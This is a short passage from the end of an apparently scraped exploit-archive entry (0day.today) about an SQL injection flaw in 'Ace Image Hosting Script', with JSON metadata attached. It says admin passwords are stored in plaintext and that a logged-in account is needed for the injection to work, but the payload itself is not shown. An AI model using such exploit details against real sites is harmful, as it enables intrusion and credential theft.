/admin/\r\npasswords are in plaintext\r\nyou MUST create a account and login before the injection will work\r\n\r\n\r\n\r\n--==+================================================================================+==--\r\n--==+\t\t Ace Image Hosting Script SQL Injection Vulnerbility\t +==--\r\n--==+================================================================================+==--\r\n\r\n\r\n\n# 0day.today [2018-01-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/2347"}]}